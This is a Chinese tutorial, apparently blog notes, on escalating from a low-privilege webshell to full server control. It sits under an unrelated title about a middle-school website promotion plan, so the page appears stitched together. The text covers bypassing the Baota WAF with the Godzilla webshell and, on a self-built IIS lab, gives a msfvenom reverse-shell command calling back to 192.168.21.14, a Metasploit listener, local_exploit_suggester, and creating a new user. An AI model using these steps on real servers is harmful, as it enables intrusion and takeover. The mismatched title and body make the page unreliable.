中学生网站作品网站维护和推广方案
前言
原本我还是傻傻的以为 拿到webshell就可以穿他的服务器了 还是发现太天真了 一些网站你拿到的webshell都是最低权限 什么事情也做不了
影响提权的因素:
无需提权
1、网站的搭建方式会很大的影响到我们的提取 如果是利用集成化的工具搭建的网站我们拿到webshell就是最高的权限(宝塔除外 宝塔有waf防护你进行提权)
2、还有就是语言 如果你使用的是java的话 拿到webshell就拿到了他的服务器
需要提权
1、就是我们说的宝塔waf
2、语言类就是php和asp asp.net都是需要提取的
因为这类语言在用户的分类中有个专门的组叫做 ISS服务器专属组 这个组是处于用户权限的最底层
3、自行搭建(自己配置中间件 数据库 语言)
4、虚拟docker(docker拿到的权限是虚拟权限 需要拿到宿主机权限)
还是这个图 上一节学的是 如何使用 后台数据库 拿到webshell 现在我们的位置是 web权限拿到计算机最高权限
案例一 宝塔Bypass
使用哥斯拉自带的功能 bypass实现
使用宝塔的特征:
就是我们执行命令或者是进行目录翻越时会报错
使用哥斯拉自带的bypass
案例二 自行搭建 win 2008+asp
自行搭建sever的时候会有密钥Windows Server 2012安装密钥 - 小油2018 - 博客园
他的文章的密钥都是可以使用的 还有个注意点就是安装gui模式的win 不然不是图形化的界面
然后搭建上iss Windows IIS服务器安装(超详细)_iis安装-CSDN博客
之后哥斯拉上传一个后门
连接发现 用户不是SYSYEM而是iis appool
这就需要我们进行提权 :
提取的步骤还是第一步先判断 是不是宝塔类的 怎么判断? 有个最简单的方法就是使用哥斯拉进行判断
第二种就是盲打
这边我们通过特征就知道他是 iss+win自行搭建了 因为这个iis策略组是win特有的
提权先使用哥斯拉给的工具如果提权不了就使用 msf
但是发现这两个工具就是一坨 msf启动
有什么不会的命令就使用补全
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.21.14 LPORT=5566 -f exe -o msf.exe小白解释 : msfvenom 是专门用来生成反弹shell的
-p payload 类型 这边就是生成的反弹shell是用于win还是 linux
Lhost : listen 监听ip 和 端口
-f 是输出类型 是个exe
-o 表示输出的名称
在此之前我们先使用msf进行监听接受shell
启用监听模块 
配置监听的ip和端口
配置要监听的paylaod
启用监听
让受害机运行上线
监听到
之后进行本地kali提权
看一下当前的权限是 iss
进行提权:先使用全自动exp进行搜哈系统漏洞
use post/multi/recon/local_exploit_suggester
直接搜哈
找成功的
直接执行
执行shell命令把权限搞到本地
新建个用户玩一玩